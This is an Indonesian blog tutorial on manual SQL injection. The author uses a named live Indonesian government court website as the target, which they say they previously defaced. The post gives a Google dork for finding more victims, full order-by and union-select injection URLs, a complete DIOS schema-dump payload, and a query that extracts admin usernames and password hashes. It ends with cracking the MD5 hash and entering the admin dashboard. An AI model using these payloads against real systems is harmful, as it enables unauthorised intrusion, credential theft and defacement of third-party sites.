SQLi with DIOS by cyberscry

tutorial SQLi manual with DIOS v.2

Maaf jika Live Target Kami Web .Id . saya buat sebagai live karena dulu udah pernah saya deface dan saya laporin bug nya tapi admin biasa aja soal itu tidak di path . sedangkan saya masih kurang faham soal path nya :v

Dork : inurl:.php?id= site:
( kembangin )

live : http://pa-palu.go.id/profil/detailhakim.php?id=3





pertama cek web nya vuln SQLi apa tidak dengan cara menambahkan string ( ' ) di belakang angka , jika vuln maka akan muncul error seperti gambar ini


setelah tahu itu vuln SQLi , kita mencari jumlah column yang error untuk mengetahui table nya
Dengan , " order by "

tambah kan +order+by+1--+ di belakang url web yang sudah di beri string ( ' )  jika tampilan kembali normal maka di lanjut angka 2 dan seterusnya sampai error

seperti ini :




http://pa-palu.go.id/profil/detailhakim.php?id=3'+order+by+1--+            [ Normal ]
http://pa-palu.go.id/profil/detailhakim.php?id=3'+order+by+2--+            [ Normal ]
http://pa-palu.go.id/profil/detailhakim.php?id=3'+order+by+3--+            [ Normal ]
http://pa-palu.go.id/profil/detailhakim.php?id=3'+order+by+4--+            [ Normal ]

DAN SETERUSNYA SAMPAI KETEMU ERROR

http://pa-palu.go.id/profil/detailhakim.php?id=3'+order+by+14--+           [ Error ]




Jumlah column Error nya terdapat di nomor 14 , berarti jumlah column sebenarnya Ada 13

Selanjutnya hapus order by hingga kembali ke link semula yang di beri string ( ' )  Kita tambah  dengan " +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+ "  kenapa angka 1 sampai 13 ? karena jumlah column yang kita cek tadi 1 - 14 dan angka 14 nya error , maka jumlah column nya 1 - 13 , dan jangan lupa di kasih titik sebelum angka 
contoh id=3' menjadi id=.3'            << sebelum angka 3 ada titik nya


seperti ini hasil nya :

http://pa-palu.go.id/profil/detailhakim.php?id=.3'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+

Nanti Akan muncul angka rahasia , jika tidak muncul maka tinggal kan web nya cari yang lain

angka rahasia nya seperti ini



angka rahasia itu menunjuk ke url kita , jadi url kita di urutan angka 3 ( angka yg muncul di atas)  di ganti dengan DIOS maka akan muncul Table database web tersebut ,

DIOS :

/*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/

langsung aja kalian isi dios nya

dari awal nya :

http://pa-palu.go.id/profil/detailhakim.php?id=.3'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+

menjadi :

http://pa-palu.go.id/profil/detailhakim.php?id=.3'+union+select+1,2,/*!00000/*!00000%28select%28@x%29from%28select%28@x:=0x00%29,%28select%280%29from%28information_schema.columns%29where%28table_schema=database%28%29%29and%280x00%29in%28@x:=concat+%28@x,0x3c62723e,database%28%29,0x3a3a,table_name,0x203a3a20,column_name%29%29%29%29x%29*/,4,5,6,7,8,9,10,11,12,13--+


 maka akan muncul banyak database di web tsb seperti gambar di bawah ini



    setelah muncul database kita cari db username dan password admin login , setelah saya cari ternyata username admin login berada di Database USERS seperti yang saya tampil kan di gambar di atas , terkadang info username dan password berbeda-beda di suatu web ,
 
    nah setelah tahu tempat Database username dan password admin kita ambil username dan password nya .






cara nya begini :

hapus DIOS lalu gnti dengan

Concat(username,0x0a,password)

 lalu yang di bagian belakang --+ di ganti menjadi

+from+users--+
 
 
tulisan yang saya merahin itu bisa berganti-ganti tinggal kita mau mengambil database sebelah mana
fokus dan fahami tulisan merah username , password , users , lihat pada gambar


nah awalnya kan begini (DIOS saya tandai warna ijo biar ga bingung) :

http://pa-palu.go.id/profil/detailhakim.php?id=.3'+union+select+1,2,/*!00000/*!00000%28select%28@x%29from%28select%28@x:=0x00%29,%28select%280%29from%28information_schema.columns%29where%28table_schema=database%28%29%29and%280x00%29in%28@x:=concat+%28@x,0x3c62723e,database%28%29,0x3a3a,table_name,0x203a3a20,column_name%29%29%29%29x%29*/,4,5,6,7,8,9,10,11,12,13--+


dan setelah kita ganti maka akan menjadi :

http://pa-palu.go.id/profil/detailhakim.php?id=.3'+union+select+1,2,Concat(username,0x0a,password),4,5,6,7,8,9,10,11,12,13+from+users--+


dan munculah data username dan password web tersebut ^_^


sengaja saya tutup agar tidak kelihatan id pass nya supaya anda belajar sendiri :)

di gambar yang saya tutupin itu adalah  username  dan password web tersebut , namun password nya harus di hash terlebih dahulu 

misalkan CONTOH nanti muncul 

super 7ddf32e17a6ac5ce04a8ecbf782ca509

maka username nya adalah super, passwordnya masih berupa kode dan kita harus meng decrypt terlebih dahulu , biasanya decript nya berupa md5 , sha1 dll bisa cari di google , 

contoh di atas

7ddf32e17a6ac5ce04a8ecbf782ca509


setelah saya cari di google ternyata berbentuk decript type md5 yang artinya random

jadi bisa kita simpulkan

username admin     = super
password                 = random

nh kita tinggal mencari login admin setelah itu kita memasukkan username dan password 
dan taraaaaaa kita berhasil masuk dasboard admin :) terserah mau di apain :)


   
maaf nanti nya jika live target ini sudah di path oleh admin web

sekian tutor SQLi dari saya , semoga bermanfaat.
wassalamualaikum wr.wb 

special thanks to  Mr.Bro_Tx Anonymous Cyber Team yang udah mau ngajarin saya :)

Komentar

Postingan populer dari blog ini

Cara Menyimpan Vidio Youtube Ke Galeri

Tutorial Cara Download Video Yang Hanya Bisa Streaming

Kojima Natsuki 1st Photobook SOCO SOCO Full Scans PB